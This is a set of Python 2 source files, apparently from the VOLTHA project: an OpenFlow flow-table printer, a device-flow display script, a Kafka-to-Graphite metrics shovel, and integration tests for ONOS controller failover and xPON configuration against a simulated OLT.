from termcolor import cprint, colored
from os.path import join as pjoin
def p_cookie(cookie):
cookie = str(cookie)
if len(cookie) > 8:
return cookie[:6] + '...'
else:
return cookie
'''
OFPP_NORMAL = 0x7ffffffa; /* Forward using non-OpenFlow pipeline. */
OFPP_FLOOD = 0x7ffffffb; /* Flood using non-OpenFlow pipeline. */
OFPP_ALL = 0x7ffffffc; /* All standard ports except input port. */
OFPP_CONTROLLER = 0x7ffffffd; /* Send to controller. */
OFPP_LOCAL = 0x7ffffffe; /* Local openflow "port". */
OFPP_ANY = 0x7fffffff; /* Special value used in some requests when
'''
def p_port(port):
if port & 0x7fffffff == 0x7ffffffa:
return 'NORMAL'
elif port & 0x7fffffff == 0x7ffffffb:
return 'FLOOD'
elif port & 0x7fffffff == 0x7ffffffc:
return 'ALL'
elif port & 0x7fffffff == 0x7ffffffd:
return 'CONTROLLER'
elif port & 0x7fffffff == 0x7ffffffe:
return 'LOCAL'
elif port & 0x7fffffff == 0x7fffffff:
return 'ANY'
else:
return str(port)
def p_vlan_vid(vlan_vid):
if vlan_vid == 0:
return 'untagged'
assert vlan_vid & 4096 == 4096
return str(vlan_vid - 4096)
def p_ipv4(x):
return '.'.join(str(v) for v in [
(x >> 24) & 0xff, (x >> 16) & 0xff, (x >> 8) & 0xff, x & 0xff
])
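# Quick illustrative examples of the formatters above:
#   p_port(0x7ffffffd) -> 'CONTROLLER'      p_port(12)       -> '12'
#   p_vlan_vid(0)      -> 'untagged'        p_vlan_vid(4196) -> '100'
#   p_ipv4(0xc0a80001) -> '192.168.0.1'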
field_printers = {
'IN_PORT': lambda f: (100, 'in_port', p_port(f['port'])),
'VLAN_VID': lambda f: (101, 'vlan_vid', p_vlan_vid(f['vlan_vid'])),
'VLAN_PCP': lambda f: (102, 'vlan_pcp', str(f['vlan_pcp'])),
'ETH_TYPE': lambda f: (103, 'eth_type', '%X' % f['eth_type']),
'IPV4_DST': lambda f: (104, 'ipv4_dst', p_ipv4(f['ipv4_dst'])),
'IP_PROTO': lambda f: (105, 'ip_proto', str(f['ip_proto']))
}
def p_field(field):
assert field['oxm_class'].endswith('OPENFLOW_BASIC')
ofb = field['ofb_field']
assert not ofb['has_mask']
type = ofb['type'][len('OFPXMT_OFB_'):]
weight, field_name, value = field_printers[type](ofb)
return 1000 + weight, 'set_' + field_name, value
action_printers = {
'SET_FIELD': lambda a: p_field(a['set_field']['field']),
'POP_VLAN': lambda a: (2000, 'pop_vlan', 'Yes'),
'PUSH_VLAN': lambda a: (2001, 'push_vlan', '%x' % a['push']['ethertype']),
'GROUP': lambda a: (3000, 'group', p_port(a['group']['group_id'])),
'OUTPUT': lambda a: (4000, 'output', p_port(a['output']['port'])),
}
class ScriptBase(object):
usage = 'To be filled by derived class'
deep_header = {'get-depth': '-1'}
def __init__(self):
self.voltha_base_url = os.environ.get('VOLTHA_BASE_URL')
if self.voltha_base_url is None:
self.err(1)
def err(self, code, msg=None):
if msg is None:
msg = self.usage
print >> sys.stderr, msg
sys.exit(code)
def fetch_logical_device_info(self, base_url, logical_device_id):
url = pjoin(base_url, 'logical_devices', logical_device_id)
res = requests.get(url, headers=self.deep_header)
if res.ok:
return res.json()
else:
self.err('could not fetch logical device at {}: {}'.format(
url, res.text))
def fetch_device_info(self, base_url, device_id):
url = pjoin(base_url, 'devices', device_id)
res = requests.get(url, headers=self.deep_header)
if res.ok:
return res.json()
else:
self.err('could not fetch device at {}: {}'.format(url, res.text))
def print_flows(self, what, id, type, flows, groups):
print
print ''.join([
'{} '.format(what),
colored(id, color='green', attrs=['bold']),
' (type: ',
colored(type, color='blue'),
')'
])
print 'Flows:'
max_field_lengths = {}
field_names = {}
def update_max_length(field_key, string):
length = len(string)
if length > max_field_lengths.get(field_key, 0):
max_field_lengths[field_key] = length
def add_field_type(field_key, field_name):
if field_key not in field_names:
field_names[field_key] = field_name
update_max_length(field_key, field_name)
else:
assert field_names[field_key] == field_name
cell_values = {}
# preprocess data
for i, flow in enumerate(flows):
def add_field(field_key, field_name, value):
add_field_type(field_key, field_name)
row = cell_values.setdefault(i, {})
row[field_key] = value
update_max_length(field_key, value)
add_field(0, 'table_id', value=str(flow['table_id']))
add_field(1, 'priority', value=str(flow['priority']))
add_field(2, 'cookie', p_cookie(flow['cookie']))
assert flow['match']['type'] == 'OFPMT_OXM'
for field in flow['match']['oxm_fields']:
assert field['oxm_class'].endswith('OPENFLOW_BASIC')
ofb = field['ofb_field']
assert not ofb['has_mask'], 'masked match not handled yet' # TODO
type = ofb['type'][len('OFPXMT_OFB_'):]
add_field(*field_printers[type](ofb))
for instruction in flow['instructions']:
if instruction['type'] == 4:
for action in instruction['actions']['actions']:
type = action['type'][len('OFPAT_'):]
add_field(*action_printers[type](action))
# print header
field_keys = sorted(field_names.keys())
def p_sep():
print '+' + '+'.join(
[(max_field_lengths[k] + 2) * '-' for k in field_keys]) + '+'
p_sep()
print '| ' + ' | '.join(
'%%%ds' % max_field_lengths[k] % field_names[k]
for k in field_keys) + ' |'
p_sep()
# print values
for i in xrange(len(flows)):
row = cell_values[i]
cprint('| ' + ' | '.join(
'%%%ds' % max_field_lengths[k] % row.get(k, '')
for k in field_keys
) + ' |')
if not ((i + 1) % 3):
p_sep()
if ((i + 1) % 3):
p_sep()
# TODO groups TBF
assert len(groups) == 0
```
#### File: voltha/scripts/show_logical_device_flows.py
```python
import os
import sys
from scripts.scriptbase import ScriptBase
class _(ScriptBase):
usage = """
Usage: {} <logical-device-id>
Make sure you have VOLTHA_BASE_URL environment variable
defined, examples:
export VOLTHA_BASE_URL=http://localhost:8881/api/v1
or
export VOLTHA_BASE_URL=http://10.100.192.220:8881/api/v1
""".format(sys.argv[0])
def main(self):
if len(sys.argv) != 2:
self.err(1)
logical_device_id = sys.argv[1]
logical_device = self.fetch_logical_device_info(
self.voltha_base_url, logical_device_id)
self.print_flows(
'Logical device',
logical_device_id,
type='n/a',
flows=logical_device['flows']['items'],
groups=logical_device['flow_groups']['items']
)
if __name__ == '__main__':
_().main()
```
#### File: voltha/shovel/main.py
```python
from optparse import OptionParser
import simplejson
import structlog
from kafka import KafkaConsumer
import pickle
import struct
import socket
import sys
import time
from kafka.consumer.fetcher import ConsumerRecord
from kafka.errors import KafkaError
from common.utils.consulhelpers import get_endpoint_from_consul
log = structlog.get_logger()
class Graphite:
def __init__(self, host='localhost', port=2004, retry=5, delay=3,
backoff=2, timeout=10):
self.host = host
self.port = port
self.retry = retry
self.delay = delay
self.backoff = backoff
self.timeout = timeout
# Create initial socket
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.settimeout(self.timeout)
# Initiate connection
self.connect()
def _backoff(self, retry, delay, backoff):
"""Exponential backoff."""
retry -= 1
if retry == 0:
raise Exception('Timeout')
time.sleep(delay)
delay *= backoff
return retry, delay, backoff
def _retry(self, exception, func, *args):
"""
Retry calling the func catching a tuple of exceptions with backoff.
"""
retry = self.retry
delay = self.delay
backoff = self.backoff
while retry > 0:
try:
return func(*args)
except exception, e:
retry, delay, backoff = self._backoff(retry, delay, backoff)
def connect(self):
"""Connect to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
while retry > 0:
try:
# Attempt to connect to Graphite, break if success
self.conn.connect((self.host, self.port))
break
            except socket.error, e:
                # Ditch this socket and create a new one before the next attempt
                self.conn.close()
                self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.conn.settimeout(self.timeout)
                retry, delay, backoff = self._backoff(retry, delay, backoff)
def close(self):
"""Close connection go Graphite."""
self.conn.close()
def send(self, data, retry=3):
"""Send data to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
# Attempt to send any data in the queue
while retry > 0:
# Check socket
if not self.conn:
                # Attempt to re-establish the connection
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
try:
# Send data to socket
self.conn.sendall(data)
break
except socket.error, e:
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
def _pickle(batch):
"""Pickle metrics into graphite format."""
payload = pickle.dumps(batch)
header = struct.pack("!L", len(payload))
message = header + payload
return message
def _convert(msg):
"""Convert a graphite key value string to pickle."""
def extract_slice(ts, prefixes):
for object_path, metrics in prefixes.iteritems():
for metric_name, value in metrics['metrics'].iteritems():
path = '.'.join((object_path, metric_name))
yield (path, ts, value)
assert isinstance(msg, dict)
type = msg.get('type')
if type == 'slice':
extractor, kw = extract_slice, dict(ts=msg['ts'],
prefixes=msg['prefixes'])
else:
raise Exception('Unknown format')
batch = []
for path, timestamp, value in extractor(**kw):
batch.append((path, (timestamp, value)))
return batch
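# Illustrative example of the expected 'slice' message and the batch it yields
# (names and values are made up):
#
#   msg = {'type': 'slice', 'ts': 1500000000,
#          'prefixes': {'voltha.ponsim_olt.0001.nni': {
#              'metrics': {'tx_64_pkts': 12, 'rx_64_pkts': 7}}}}
#   _convert(msg)
#   # -> [('voltha.ponsim_olt.0001.nni.tx_64_pkts', (1500000000, 12)),
#   #     ('voltha.ponsim_olt.0001.nni.rx_64_pkts', (1500000000, 7))]
#   # _pickle() then prepends a 4-byte big-endian length header so the batch
#   # can be written directly to Graphite's pickle receiver (port 2004).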
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-K", "--kafka", dest="kafka",
default="localhost:9092", help="Kafka bootstrap server")
parser.add_option("-c", "--consul", dest="consul",
default="localhost:8500",
help="Consul server (needed if kafak server is specifed"
"with '@kafka' value)")
parser.add_option("-t", "--topic", dest="topic", help="Kafka topic")
parser.add_option("-H", "--host", dest="graphite_host",
default="localhost", help="Graphite host")
parser.add_option("-p", "--port", dest="graphite_port", type=int,
default=2004, help="Graphite port")
(options, args) = parser.parse_args()
# Assign OptParse variables
kafka = options.kafka
consul = options.consul
topic = options.topic
host = options.graphite_host
port = options.graphite_port
# Connect to Graphite
try:
graphite = Graphite(host, port)
    # Check gaierror first: it is a subclass of socket.error, so the broader
    # handler below would otherwise shadow it.
    except socket.gaierror, e:
        print "Invalid hostname for graphite host %s" % (host)
        sys.exit(1)
    except socket.error, e:
        print "Could not connect to graphite host %s:%s" % (host, port)
        sys.exit(1)
log.info('Connected to graphite at {}:{}'.format(host, port))
# Resolve Kafka value if it is based on consul lookup
if kafka.startswith('@'):
kafka = get_endpoint_from_consul(consul, kafka[1:])
# Connect to Kafka
try:
log.info('connect-to-kafka', kafka=kafka)
consumer = KafkaConsumer(topic, bootstrap_servers=kafka)
except KafkaError, e:
log.error('failed-to-connect-to-kafka', kafka=kafka, e=e)
sys.exit(1)
# Consume Kafka topic
log.info('start-loop', topic=topic)
for record in consumer:
assert isinstance(record, ConsumerRecord)
msg = record.value
try:
batch = _convert(simplejson.loads(msg))
except Exception, e:
log.warn('unknown-format', msg=msg)
continue
pickled = _pickle(batch)
graphite.send(pickled)
log.debug('sent', batch_len=len(batch))
log.info('exited')
```
#### File: itests/ofagent/test_ofagent_multicontroller_failover.py
```python
from time import time, sleep
import logging
import os
import json
from unittest import TestCase,main
this_dir = os.path.abspath(os.path.dirname(__file__))
from tests.itests.docutests.test_utils import run_command_to_completion_with_raw_stdout
from voltha.protos.device_pb2 import Device
from google.protobuf.json_format import MessageToDict
from tests.itests.voltha.rest_base import RestBase
from common.utils.consulhelpers import get_endpoint_from_consul
log = logging.getLogger(__name__)
DOCKER_COMPOSE_FILE = "compose/docker-compose-ofagent-test.yml"
LOCAL_CONSUL = "localhost:8500"
command_defs = dict(
docker_images="docker images",
docker_stop="docker stop",
docker_rm="docker rm",
docker_voltha_logs="docker logs -f compose_voltha_1",
docker_compose_logs="docker-compose -f {} logs".format(
DOCKER_COMPOSE_FILE),
docker_stop_and_remove_all_containers="docker stop `docker ps -q` ; "
"docker rm `docker ps -a -q`",
docker_compose_start_all="docker-compose -f {} up -d "
.format(DOCKER_COMPOSE_FILE),
docker_compose_stop="docker-compose -f {} stop"
.format(DOCKER_COMPOSE_FILE),
docker_compose_rm_f="docker-compose -f {} rm -f"
.format(DOCKER_COMPOSE_FILE),
docker_compose_ps="docker-compose -f {} ps".format(DOCKER_COMPOSE_FILE),
docker_ps="docker ps",
onos_form_cluster="./tests/itests/ofagent/onos-form-cluster",
onos1_ip="docker inspect --format '{{ .NetworkSettings.Networks.compose_default.IPAddress }}' onos1",
onos2_ip ="docker inspect --format '{{ .NetworkSettings.Networks.compose_default.IPAddress }}' onos2",
onos3_ip="docker inspect --format '{{ .NetworkSettings.Networks.compose_default.IPAddress }}' onos3",
onos1_devices="curl -u karaf:karaf http://localhost:8181/onos/v1/devices",
onos2_devices="curl -u karaf:karaf http://localhost:8182/onos/v1/devices",
onos3_devices="curl -u karaf:karaf http://localhost:8183/onos/v1/devices")
class TestOFAGENT_MultiController(RestBase):
# Test OFAgent Support for Multiple controller
def setUp(self):
# Run Voltha,OFAgent,3 ONOS and form ONOS cluster.
print "Starting all containers ..."
cmd = command_defs['docker_compose_start_all']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for all containers to be ready ..."
sleep(80)
cmd = command_defs['onos1_ip']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_ip = out
print "ONOS1 IP is {}".format(onos1_ip)
cmd = command_defs['onos2_ip']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_ip = out
print "ONOS2 IP is {}".format(onos2_ip)
cmd = command_defs['onos3_ip']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_ip = out
print "ONOS3 IP is {}".format(onos3_ip)
cmd = command_defs['onos_form_cluster'] + ' {} {} {}'.format(onos1_ip.strip(),onos2_ip.strip(),onos3_ip.strip())
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Cluster Output :{} ".format(out)
self.get_rest_endpoint()
def tearDown(self):
# Stopping and Removing Voltha,OFAgent,3 ONOS.
print "Stopping and removing all containers ..."
cmd = command_defs['docker_compose_stop']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for all containers to be stopped ..."
sleep(1)
cmd = command_defs['docker_compose_rm_f']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
def wait_till(self, msg, predicate, interval=0.1, timeout=5.0):
deadline = time() + timeout
while time() < deadline:
if predicate():
return
sleep(interval)
self.fail('Timed out while waiting for condition: {}'.format(msg))
def get_rest_endpoint(self):
# Retrieve details on the REST entry point
rest_endpoint = get_endpoint_from_consul(LOCAL_CONSUL, 'envoy-8443')
# Construct the base_url
self.base_url = 'https://' + rest_endpoint
def add_device(self):
print "Adding device"
device = Device(
type='simulated_olt',
mac_address='01:0c:e2:31:40:00'
)
device = self.post('/api/v1/devices', MessageToDict(device),
expected_http_code=200)
print "Added device - id:{}, type:{}".format(device['id'], device['type'])
sleep(5)
return device
def enable_device(self, device_id):
print "Enabling device - id:{}".format(device_id)
path = '/api/v1/devices/{}'.format(device_id)
self.post(path + '/enable', expected_http_code=200)
device = self.get(path)
self.assertEqual(device['admin_state'], 'ENABLED')
self.wait_till(
'admin state moves to ACTIVATING or ACTIVE',
lambda: self.get(path)['oper_status'] in ('ACTIVATING', 'ACTIVE'),
timeout=0.5)
# eventually, it shall move to active state and by then we shall have
# device details filled, connect_state set, and device ports created
self.wait_till(
'admin state ACTIVE',
lambda: self.get(path)['oper_status'] == 'ACTIVE',
timeout=0.5)
device = self.get(path)
images = device['images']
image = images['image']
image_1 = image[0]
version = image_1['version']
self.assertNotEqual(version, '')
self.assertEqual(device['connect_status'], 'REACHABLE')
ports = self.get(path + '/ports')['items']
self.assertEqual(len(ports), 2)
sleep(30)
print "Enabled device - id:{}".format(device_id)
def test_ofagent_controller_failover(self):
olt_device = self.add_device()
print "Output of ADD OLT is {} {} {}".format(olt_device, type(olt_device), olt_device['id'])
sleep(5)
self.enable_device(olt_device['id'])
print "Waiting for OLT device to be activated ..."
sleep(80)
cmd = command_defs['onos1_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_devices = json.loads(out)
onos1_role = onos1_devices['devices'][0]['role']
print "Role of ONOS1 is {}".format(onos1_role)
cmd = command_defs['onos2_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_devices = json.loads(out)
onos2_role = onos2_devices['devices'][0]['role']
print "Role of ONOS2 is {}".format(onos2_role)
cmd = command_defs['onos3_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_devices = json.loads(out)
onos3_role = onos3_devices['devices'][0]['role']
print "Role of ONOS3 is {}".format(onos3_role)
if onos1_role == "MASTER":
cmd = command_defs['docker_stop']+ ' onos1'
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for ONOS to Elect New Master"
sleep(20)
cmd = command_defs['onos2_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_devices = json.loads(out)
onos2_role = onos2_devices['devices'][0]['role']
print "Role of ONOS2 is {}".format(onos2_role)
cmd = command_defs['onos3_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_devices = json.loads(out)
onos3_role = onos3_devices['devices'][0]['role']
print "Role of ONOS3 is {}".format(onos3_role)
assert (onos3_role == "MASTER" or onos2_role == "MASTER"), "Exception,New Master Election Failed"
elif onos2_role == "MASTER":
cmd = command_defs['docker_stop']+ ' onos2'
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for ONOS to Elect New Master"
sleep(20)
cmd = command_defs['onos1_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_devices = json.loads(out)
onos1_role = onos1_devices['devices'][0]['role']
print "Role of ONOS1 is {}".format(onos1_role)
cmd = command_defs['onos3_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_devices = json.loads(out)
onos3_role = onos3_devices['devices'][0]['role']
print "Role of ONOS3 is {}".format(onos3_role)
assert (onos3_role == "MASTER" or onos1_role == "MASTER"), "Exception,New Master Election Failed"
elif onos3_role == "MASTER":
cmd = command_defs['docker_stop']+ ' onos3'
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for ONOS to Elect New Master"
sleep(20)
cmd = command_defs['onos1_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_devices = json.loads(out)
onos1_role = onos1_devices['devices'][0]['role']
print "Role of ONOS1 is {}".format(onos1_role)
cmd = command_defs['onos2_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_devices = json.loads(out)
onos2_role = onos2_devices['devices'][0]['role']
print "Role of ONOS2 is {}".format(onos2_role)
assert (onos1_role == "MASTER" or onos2_role == "MASTER"), "Exception,New Master Election Failed"
```
#### File: itests/voltha/test_voltha_xpon.py
```python
from tests.itests.voltha.rest_base import RestBase
from google.protobuf.json_format import MessageToDict, ParseDict
import unittest
from voltha.protos import bbf_fiber_base_pb2 as fb
from voltha.protos.device_pb2 import Device
from voltha.protos import bbf_fiber_gemport_body_pb2 as gemport
from voltha.protos import bbf_fiber_tcont_body_pb2 as tcont
from voltha.protos import bbf_fiber_traffic_descriptor_profile_body_pb2 as tdp
from common.utils.consulhelpers import get_endpoint_from_consul
'''
These tests use the Ponsim OLT to verify create, update, and delete
functionalities of ChannelgroupConfig, ChannelpartitionConfig,
ChannelpairConfig, ChannelterminationConfig, VOntAni, OntAni, and VEnets
for xPON
The prerequisites for this test are:
1. voltha ensemble is running
docker-compose -f compose/docker-compose-system-test.yml up -d
2. ponsim olt is running with PONSIM-OLT
sudo -s
. ./env.sh
./ponsim/main.py -v
'''
device_type = 'ponsim_olt'
host_and_port = '172.17.0.1:50060'
scenario = [
{'cg-add': {
'pb2': fb.ChannelgroupConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Manhattan",
"description": "Channel Group for Manhattan.."
},
"data": {
"polling_period": 100,
"system_id": "000000",
"raman_mitigation": "RAMAN_NONE"
},
"name": "Manhattan"
}
}
},
{'cpart-add': {
'pb2': fb.ChannelpartitionConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Freedom Tower",
"description":"Channel Partition for Freedom Tower in Manhattan"
},
"data": {
"differential_fiber_distance": 20,
"closest_ont_distance": 0,
"fec_downstream": False,
"multicast_aes_indicator": False,
"authentication_method": "SERIAL_NUMBER",
"channelgroup_ref": "Manhattan"
},
"name": "Freedom Tower"
}
}
},
{'cpair-add': {
'pb2': fb.ChannelpairConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "PON port",
"description": "Channel Pair for Freedom Tower"
},
"data": {
"channelpair_linerate": "down_10_up_10",
"channelpair_type": "channelpair",
"channelgroup_ref": "Manhattan",
"gpon_ponid_interval": 0,
"channelpartition_ref": "Freedom Tower",
"gpon_ponid_odn_class": "CLASS_A"
},
"name": "PON port"
}
}
},
{'cterm-add': {
'pb2': fb.ChannelterminationConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "PON port",
"description": "Channel Termination for Freedom Tower"
},
"data": {
"channelpair_ref": "PON port",
"location": "Freedom Tower OLT"
},
"name": "PON port"
}
}
},
{'vontani-add': {
'pb2': fb.VOntaniConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Golden User",
"description": "Golden User in Freedom Tower"
},
"data": {
"preferred_chanpair": "PON port",
"expected_serial_number": "PSMO00000001",
"parent_ref": "Freedom Tower",
"onu_id": 1
},
"name": "Golden User"
}
}
},
{'ontani-add': {
'pb2': fb.OntaniConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Golden User",
"description": "Golden User in Freedom Tower"
},
"data": {
"upstream_fec_indicator": True,
"mgnt_gemport_aes_indicator": False
},
"name": "Golden User"
}
}
},
{'venet-add': {
'pb2': fb.VEnetConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Enet UNI 1",
"description": "Ethernet port - 1"
},
"data": {
"v_ontani_ref": "Golden User"
},
"name": "Enet UNI 1"
}
}
},
{'tdp-add': {
'pb2': tdp.TrafficDescriptorProfileData(),
'rpc': {
"name": "TDP 1",
"assured_bandwidth": "500000",
"additional_bw_eligibility_indicator": \
"ADDITIONAL_BW_ELIGIBILITY_INDICATOR_NONE",
"fixed_bandwidth": "100000",
"maximum_bandwidth": "1000000",
}
}
},
{'tcont-add': {
'pb2': tcont.TcontsConfigData(),
'rpc': {
"interface_reference": "Golden User",
"traffic_descriptor_profile_ref": "TDP 1",
"name": "TCont 1"
}
}
},
{'tcont-add-with-alloc-id': {
'pb2': tcont.TcontsConfigData(),
'rpc': {
"interface_reference": "Golden User",
"traffic_descriptor_profile_ref": "TDP 1",
"name": "TCont 2",
"alloc_id": 1234
}
}
},
{'tcont-add-with-alloc-id-zero': {
'pb2': tcont.TcontsConfigData(),
'rpc': {
"interface_reference": "Golden User",
"traffic_descriptor_profile_ref": "TDP 1",
"name": "TCont 3",
"alloc_id": 0
}
}
},
{'gemport-add': {
'pb2': gemport.GemportsConfigData(),
'rpc': {
"aes_indicator": True,
"name": "GEMPORT 1",
"traffic_class": 0,
"itf_ref": "Enet UNI 1",
"tcont_ref": "TCont 1",
}
}
},
{'gemport-add-with-gemport-id': {
'pb2': gemport.GemportsConfigData(),
'rpc': {
"aes_indicator": True,
"name": "GEMPORT 2",
"traffic_class": 0,
"itf_ref": "Enet UNI 1",
"tcont_ref": "TCont 2",
"gemport_id": 2345
}
}
},
{'gemport-add-with-gemport-id-zero': {
'pb2': gemport.GemportsConfigData(),
'rpc': {
"aes_indicator": True,
"name": "GEMPORT 2",
"traffic_class": 0,
"itf_ref": "Enet UNI 1",
"tcont_ref": "TCont 2",
"gemport_id": 0
}
}
}
]
#for ordering the test cases
id = 3
LOCAL_CONSUL = "localhost:8500"
# Retrieve details of the REST entry point
rest_endpoint = get_endpoint_from_consul(LOCAL_CONSUL, 'envoy-8443')
# Construct the base_url
BASE_URL = 'https://' + rest_endpoint
class GlobalPreChecks(RestBase):
base_url = BASE_URL
# def test_000_get_root(self):
# res = self.get('/#!/', expected_content_type='text/html')
# self.assertGreaterEqual(res.find('swagger'), 0)
def test_001_get_health(self):
res = self.get('/health')
self.assertEqual(res['state'], 'HEALTHY')
class TestXPon(RestBase):
base_url = BASE_URL
def test_002_setup_device(self):
global device
device = self.add_device()
self.verify_device_preprovisioned_state(device['id'])
self.activate_device(device['id'])
def _remove_device(self):
self.deactivate_device(device['id'])
self.delete_device(device['id'])
#~~~~~~~~~~~~~~~~~~~~~~ Helper Functions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Create a new simulated device
def add_device(self):
return self.post('/api/v1/devices',
MessageToDict(Device(
type=device_type,
host_and_port=host_and_port
)),
expected_http_code=200)
def verify_device_preprovisioned_state(self, olt_id):
# we also check that so far what we read back is same as what we get
# back on create
device = self.get('/api/v1/devices/{}'.format(olt_id))
self.assertNotEqual(device['id'], '')
self.assertEqual(device['adapter'], 'ponsim_olt')
self.assertEqual(device['admin_state'], 'PREPROVISIONED')
self.assertEqual(device['oper_status'], 'UNKNOWN')
# Active the simulated device.
# This will trigger the simulation of random alarms
def activate_device(self, device_id):
path = '/api/v1/devices/{}'.format(device_id)
self.post(path + '/enable', expected_http_code=200)
device = self.get(path)
self.assertEqual(device['admin_state'], 'ENABLED')
def deactivate_device(self, device_id):
path = '/api/v1/devices/{}'.format(device_id)
self.post(path + '/disable', expected_http_code=200)
device = self.get(path)
self.assertEqual(device['admin_state'], 'DISABLED')
def delete_device(self, device_id):
path = '/api/v1/devices/{}'.format(device_id)
self.delete(path + '/delete', expected_http_code=200)
device = self.get(path, expected_http_code=404)
self.assertIsNone(device)
# Add cg, cpair, cpart
def add(self, type, config, req, name):
res = self.verify(type)
prev_len = len(res[config])
self.post(self.get_path(type, name, ''),
MessageToDict(req, preserving_proto_field_name = True),
expected_http_code = 200)
return self.verify(type), prev_len
# Modify the existing cg, cpair, cpart
def modify(self, type, req, name):
self.post(self.get_path(type, name, '/modify'),
MessageToDict(req, preserving_proto_field_name = True),
expected_http_code = 200)
return self.verify(type)
# Delete cg, cpair, cpart
def remove(self, type, config, name):
res = self.verify(type)
prev_len = len(res[config])
self.delete(self.get_path(type, name, '/delete'),
expected_http_code = 200)
return self.verify(type), prev_len
# Retrieve the desired item upon Post message
def verify(self, type):
if(type == 'channel_terminations'):
return self.get('/api/v1/devices/{}/{}'.format(device['id'], type))
return self.get('/api/v1/{}'.format(type))
def get_path(self, type, name, operation):
if(type == 'channel_terminations'):
return '/api/v1/devices/{}/{}/{}{}'.format(device['id'],
type, name, operation)
return '/api/v1/{}/{}{}'.format(type, name, operation)
# Method to check if the result is same as the change requested
def search(self, req, result):
dict1 = MessageToDict(req,
including_default_value_fields = True,
preserving_proto_field_name = True)
#skip comparison of READ-ONLY fields
result['id'] = ''
if isinstance(req, fb.ChannelgroupConfig):
result['cg_index'] = 0
elif isinstance(req, tcont.TcontsConfigData):
result['alloc_id'] = 0
elif isinstance(req, gemport.GemportsConfigData):
result['gemport_id'] = 0
return dict1 == result
#~~~~~~~~~~~~~~ Function to create test cases on the fly ~~~~~~~~~~~~~~~~
def create_dynamic_method(key, value):
obj_type_config = {
'cg': {'type':'channel_groups',
'config':'channelgroup_config'},
'cpart': {'type':'channel_partitions',
'config':'channelpartition_config'},
'cpair': {'type':'channel_pairs',
'config':'channelpair_config'},
'cterm': {'type':'channel_terminations',
'config':'channeltermination_config'},
'vontani':{'type':'v_ont_anis',
'config':'v_ontani_config'},
'ontani': {'type':'ont_anis',
'config':'ontani_config'},
'venet': {'type':'v_enets',
'config':'v_enet_config'},
'gemport':{'type':'gemports',
'config':'gemports_config'},
'tcont': {'type':'tconts',
'config':'tconts_config'},
'tdp': {'type':'traffic_descriptor_profiles',
'config':'traffic_descriptor_profiles'}
}
def _add(self, type, config, req, name):
result, prev_len = self.add(type, config, req, name)
self.assertEqual(result[config][prev_len]['name'], name)
self.assertEqual(len(result[config]), prev_len+1)
self.assertEqual(self.search(req, result[config][0]), True)
def _mod(self, type, config, req, name):
result = self.modify(type, req, name)
self.assertEqual(self.search(req, result[config][0]), True)
def _del(self, type, config, req, name):
result, prev_len = self.remove(type, config, name)
self.assertEqual(len(result[config]), prev_len-1)
def _operate(self, obj_action, type_config, req, name):
if obj_action == 'add':
_add(self, type_config['type'], type_config['config'], req, name)
elif obj_action == 'mod':
_mod(self, type_config['type'], type_config['config'], req, name)
elif obj_action == 'del':
_del(self, type_config['type'], type_config['config'], req, name)
def _config(self):
ParseDict(value['rpc'], value['pb2'])
return value['pb2']
def dynamic_test_method(self):
_obj_action = [val for val in key.split('-')]
_type_config = obj_type_config[_obj_action[0]]
_req = _config(self)
_operate(self, _obj_action[1], _type_config, _req, value['rpc']['name'])
return dynamic_test_method
#read the set instructions for tests
#dynamically create test cases in desired sequence
for item in scenario:
id = id + 1
if(isinstance(item, dict)):
for k,v in item.items():
dynamic_method = create_dynamic_method(k, v)
dynamic_method.__name__ = 'test_{:3d}_{}'.format(id, k).replace(
' ', '0')
setattr(TestXPon, dynamic_method.__name__, dynamic_method)
del dynamic_method
if __name__ == '__main__':
unittest.main()
```
